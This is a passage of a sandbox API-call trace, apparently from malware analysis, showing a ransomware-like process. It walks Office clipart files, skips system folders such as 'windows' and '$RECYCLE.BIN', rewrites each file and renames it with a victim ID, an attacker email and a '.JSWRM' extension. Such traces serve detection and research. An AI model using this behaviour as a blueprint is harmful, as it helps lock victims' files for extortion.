cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00915_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00915_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00915_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00915_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0079.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.339] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12748) returned 1 [0079.339] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x31c0) returned 0x24d210 [0079.339] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x31c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x31c0, lpOverlapped=0x0) returned 1 [0079.342] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.342] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x31c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x31c0, lpOverlapped=0x0) returned 1 [0079.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.342] CloseHandle (hObject=0x314) returned 1 [0079.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0079.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0079.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0079.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0079.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.342] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0079.343] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe00f20a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00919_.WMF", cAlternateFileName="")) returned 1 [0079.343] lstrcmpiW (lpString1="IN00919_.WMF", lpString2=".") returned 1 [0079.343] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="..") returned 1 [0079.343] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="...") returned 1 [0079.343] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="windows") returned -1 [0079.343] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="recovery") returned -1 [0079.343] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="perflogs") returned -1 [0079.344] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="documents and settings") returned 1 [0079.344] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.344] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="system volume information") returned -1 [0079.344] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="msocache") returned -1 [0079.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00919_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00919_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00919_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00919_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00919_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00919_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.345] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6920) returned 1 [0079.345] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b00) returned 0x205850 [0079.345] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b00, lpOverlapped=0x0) returned 1 [0079.347] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.347] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b00, lpOverlapped=0x0) returned 1 [0079.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.347] CloseHandle (hObject=0x314) returned 1 [0079.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0079.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0079.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0079.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0079.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.347] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.348] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe00f20a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe00f20a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00956_.WMF", cAlternateFileName="")) returned 1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2=".") returned 1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="..") returned 1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="...") returned 1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="windows") returned -1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="recovery") returned -1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="perflogs") returned -1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="documents and settings") returned 1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="system volume information") returned -1 [0079.348] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="msocache") returned -1 [0079.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0079.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00956_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00956_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00956_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0079.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0079.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00956_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00956_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00956_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0079.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.349] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1256) returned 1 [0079.349] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x230a00 [0079.349] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4e0, lpOverlapped=0x0) returned 1 [0079.352] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.352] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4e0, lpOverlapped=0x0) returned 1 [0079.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0079.352] CloseHandle (hObject=0x314) returned 1 [0079.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0079.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0079.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0079.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0079.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0079.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.353] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0079.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.353] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe00f20a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00957_.WMF", cAlternateFileName="")) returned 1 [0079.353] lstrcmpiW (lpString1="IN00957_.WMF", lpString2=".") returned 1 [0079.353] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="..") returned 1 [0079.353] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="...") returned 1 [0079.353] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="windows") returned -1 [0079.353] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="recovery") returned -1 [0079.354] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="perflogs") returned -1 [0079.354] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="documents and settings") returned 1 [0079.354] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.354] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="system volume information") returned -1 [0079.354] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="msocache") returned -1 [0079.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00957_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00957_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00957_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00957_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00957_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00957_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft 